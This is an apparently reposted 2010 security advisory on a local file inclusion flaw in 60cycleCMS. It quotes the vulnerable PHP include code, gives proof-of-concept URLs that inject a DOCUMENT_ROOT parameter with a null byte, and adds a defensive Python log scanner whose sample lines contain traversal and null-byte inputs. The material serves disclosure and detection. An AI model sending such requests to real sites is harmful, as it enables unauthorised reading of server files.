60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability

2010.05.25
Credit: eidelweiss
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

########################################################

[!] Description

60cycleCMS is a simple CMS using PHP and MySQL. It is designed for blogging on personal websites, and was first written to power 60cycle.net. For the purposes of easy integration into existing sites, 60cycleCMS does not include a web template.

[!]-=[ Vuln C0de ]=-[!]

[-] 60cycleCMS_path/news.php

    <?php
    require 'common/lib.php';
    $root = $_SERVER['DOCUMENT_ROOT'];
    require_once("$root/../config.php");

[-] 60cycleCMS_path/submitComment.php

    <?php
    session_start();
    require_once('lib/recaptchalib.php');
    require_once('lib/htmlpurifier-4.0.0/HTMLPurifier.standalone.php');
    $root = $_SERVER['DOCUMENT_ROOT'];
    require_once("$root/../config.php");

[-] 60cycleCMS_path/common/sqlConnect.php

    <?php
    // include your sql info file here
    $root = $_SERVER['DOCUMENT_ROOT'];
    require "$root/../config.php";

[!] -=[ Proof Of Concept ]=-[!]

http://127.0.0.1/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00
http://127.0.0.1/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00
http://127.0.0.1/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00

########################################################

References:

http://xforce.iss.net/xforce/xfdb/57873
http://www.securityfocus.com/bid/39473
http://www.securityfocus.com/archive/1/archive/1/510721/100/0/threaded
http://www.exploit-db.com/exploits/12249
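
For defenders reviewing web server logs, the following is an added example (not part of the original advisory or of 60cycleCMS) that flags requests matching the shape of the proof-of-concept URLs above: a DOCUMENT_ROOT query parameter sent to one of the three listed scripts. The log format (combined access log), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts the advisory lists as building an include path from DOCUMENT_ROOT.
AFFECTED = ("/news.php", "/submitComment.php", "/common/sqlConnect.php")
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, placeholder values).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/May/2010:10:00:00 +0000] "GET /60cycleCMS_path/news.php?id=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [25/May/2010:10:00:05 +0000] "GET /60cycleCMS_path/news.php?DOCUMENT_ROOT=..%2F..%2Fplaceholder%00 HTTP/1.1" 200 312',
    '192.0.2.78 - - [25/May/2010:10:00:09 +0000] "GET /60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT=placeholder%2500 HTTP/1.1" 200 0',
    '192.0.2.10 - - [25/May/2010:10:00:12 +0000] "GET /index.php?DOCUMENT_ROOT=x HTTP/1.1" 404 0',
]

def classify(line):
    """Return the reasons a log line is suspicious, or [] if it is not."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith(AFFECTED):
        return []
    reasons = []
    # parse_qsl percent-decodes once, so %00 arrives here as "\x00".
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name != "DOCUMENT_ROOT":
            continue
        reasons.append("DOCUMENT_ROOT supplied as request parameter")
        value = unquote(value)  # second pass catches double encoding (%2500)
        if "\x00" in value:
            reasons.append("null byte in value")
        if "../" in value or "..\\" in value:
            reasons.append("path traversal sequence in value")
    return reasons

def scan(lines):
    """Return (client, reasons) for every flagged line."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.append((line.split()[0], reasons))
    return hits

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, "; ".join(reasons))
```

Only the query string is inspected, since POST bodies do not appear in a standard access log.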



Copyright 2021, cxsecurity.com

 
